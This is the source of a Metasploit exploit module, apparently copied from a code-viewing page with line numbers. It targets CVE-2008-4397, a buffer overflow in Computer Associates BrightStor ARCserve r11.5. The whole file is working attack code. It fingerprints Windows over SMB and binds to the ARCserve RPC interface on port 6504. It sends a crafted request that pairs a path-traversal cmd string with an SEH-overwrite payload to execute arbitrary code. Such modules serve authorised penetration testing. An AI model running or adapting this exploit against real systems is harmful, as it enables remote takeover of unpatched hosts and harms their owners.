Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::DCERPC
10
  include Msf::Exploit::Remote::SMB::Client
11
  include Msf::Exploit::Remote::Seh
12

13
  def initialize(info = {})
14
    super(update_info(info,
15
      'Name'           => 'Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow',
16
      'Description'    => %q{
17
          This module exploits a buffer overflow in Computer Associates BrightStor ARCserve r11.5 (build 3884).
18
        By sending a specially crafted RPC request to opcode 0x342, an attacker could overflow the buffer
19
        and execute arbitrary code. In order to successfully exploit this vulnerability, you will need
20
        set the hostname argument (HNAME).
21
      },
22
      'Author'         => [ 'Nahuel Cayento Riva', 'MC' ],
23
      'License'        => MSF_LICENSE,
24
      'References'     =>
25
        [
26
          [ 'BID', '31684' ],
27
          [ 'OSVDB', '49468' ],
28
          [ 'CVE', '2008-4397' ],
29
          [ 'URL', 'http://crackinglandia.blogspot.com/2009/10/el-colador-de-ca-computer-associates.html' ],
30
        ],
31
      'Privileged'     => true,
32
      'DefaultOptions' =>
33
        {
34
          'EXITFUNC' => 'thread',
35
        },
36
      'Payload'        =>
37
        {
38
          'Space'    => 550,
39
          'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
40
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
41
        },
42
      'Platform' => 'win',
43
      'Targets'  =>
44
        [
45
          [ 'Computer Associates BrightStor ARCserve r11.5 (build 3884)', { 'Ret' => 0x2123bdf4 } ], # ASCORE.dll 11.5.3884.0
46
        ],
47
      'DisclosureDate' => '2008-10-09',
48
      'DefaultTarget' => 0))
49

50
    register_options(
51
      [
52
        OptString.new('HNAME', [ true,  'The NetBios hostname of the target.']),
53
        Opt::RPORT(6504)
54
      ])
55
  end
56

57
  def fingerprint
58

59
    datastore['RPORT'] = 445
60
    os = smb_fingerprint()
61
    return os
62

63
  end
64

65
  def exploit
66

67
    path = fingerprint()
68

69
    if (path['os'] !~ /Windows/)
70
      print_error("Target not supported!")
71
      return
72
    elsif (path['os'] =~ /Windows 2000/)
73
      dir = "winnt"
74
      offset = 442
75
    else
76
      dir = "windows"
77
      offset = 436
78
    end
79

80
    print_status("Identified OS '#{path['os']}', setting appropiate system path...")
81

82
    datastore['RPORT'] = 6504
83

84
    connect()
85

86
    handle = dcerpc_handle('506b1890-14c8-11d1-bbc3-00805fa6962e', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
87
    print_status("Binding to #{handle} ...")
88

89
    dcerpc_bind(handle)
90
    print_status("Bound to #{handle} ...")
91

92
    buffer = rand_text_alpha_upper(offset) + generate_seh_payload(target.ret)
93

94
    sploit =  NDR.string("#{datastore['HNAME'].upcase}")
95
    sploit << NDR.string("..\\..\\..\\..\\..\\..\\..\\..\\..\\#{dir}\\system32\\cmd /c \"""\"""")
96
    sploit << NDR.string(buffer)
97
    sploit << NDR.string(rand_text_alpha_upper(20))
98
    sploit << NDR.long(2)
99
    sploit << NDR.long(2)
100
    sploit << NDR.string(rand_text_alpha_upper(20))
101
    sploit << NDR.long(0)
102
    sploit << NDR.long(4)
103

104
    print_status("Trying target #{target.name}...")
105

106
      begin
107
        dcerpc_call(342, sploit)
108
        rescue Rex::Proto::DCERPC::Exceptions::NoResponse
109
      end
110

111
    handler
112
    disconnect
113
  end
114
end
115

116